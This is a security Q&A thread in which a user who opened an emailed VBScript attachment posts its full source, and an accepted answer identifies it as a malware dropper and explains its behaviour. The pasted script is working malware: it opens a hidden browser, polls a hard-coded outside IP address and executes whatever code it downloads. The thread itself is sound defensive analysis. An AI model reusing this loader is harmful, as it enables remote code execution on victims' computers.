# I get an e-mail with *.VBS virus file

Tags: virus

I unwisely opened the file. I was sure that Windows will ask me if I am sure to run this script, but unfortunately, it wasn't. Now I am wondering what that file is exactly doing. Can anyone help?

content of the file:

```
' fffff
' ssssss

Dim DSLOVIEI
Dim foxtomnum, ubigs
ubigs = 0
foxtomnum = "1118812"

Call SookCanalTV(2 + 2)

Function TroceSHello(kpserial)
   On Error Resume Next
    DSLOVIEI.Quit()
    Execute "" + kpserial + "" 
End Function

Function DSLOVIEIChek(stcurl)
 Set DSLOVIEI = CreateObject("InternetExplorer.Application")
 DSLOVIEI.Visible = 0
 DSLOVIEI.navigate stcurl

 While DSLOVIEI.ReadyState <> 4 : WScript.Sleep 110 : Wend

 DSLOVIEIChek  = DSLOVIEI.document.body.innerText
End Function

Sub SookCanalTV(one)
  On Error Resume Next
    While ubigs < one
        WScript.Sleep 10 + 3    
      Call onlineZolo()
        WScript.Sleep 11000
   Wend
End Sub

Function onlineZolo()
    Dim promazzzzz
    foxtomnum = CStr(foxtomnum + 1) 
    promazzzzz = DSLOVIEIChek("http://192.3.45.90/online.php?mdms=143760135&to=" + foxtomnum)
TroceSHello(promazzzzz)
End Function
```

Comment: Unfortunately, we cannot do malicious code reviews. As you can imagine, we would get flooded with random code.

Answer (score 2, accepted):

Unfortunately, that VBS script appears to be a [dropper](https://en.wikipedia.org/wiki/Dropper_(malware)) which has installed malware to your computer. Your best option is to [reinstall your operating system](https://security.stackexchange.com/questions/138606/help-my-home-pc-has-been-infected-by-a-virus-what-do-i-do-now) and start fresh.

The script has been [uploaded to VirusTotal](https://www.virustotal.com/#/file/999e6e7982d7671da2c9534778b1cbb45a83645b5734905a0d4f2979c7b66f9c/detection) recently with indications of malware, and [hybrid-analysis](https://www.hybrid-analysis.com/sample/999e6e7982d7671da2c9534778b1cbb45a83645b5734905a0d4f2979c7b66f9c?environmentId=100) has further details of the malware after analysis.

The malware basically does the following:

1. Creates an Internet Explorer process in the background
2. Navigates to `http://192.3.45.90/online.php?mdms=71464&to=1118813` multiple times, increasing the value of the `to` parameter each time to make different GET requests and download different VBS code
3. Executes the downloaded VBS code, installing malware